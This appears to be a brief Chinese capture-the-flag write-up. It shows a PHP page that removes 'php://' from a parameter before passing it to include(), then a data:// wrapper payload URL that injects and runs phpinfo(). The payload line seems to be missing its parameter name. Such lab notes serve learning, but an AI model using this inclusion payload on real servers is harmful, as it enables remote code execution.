show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>里插入代码片
关于为协议:
https://segmentfault.com/a/1190000018991087
这里直接使用data:// 协议
http://127.0.0.1/index.php?php://data://text/plain,<?php%20phpinfo();?>
这里直接将php://替换为空了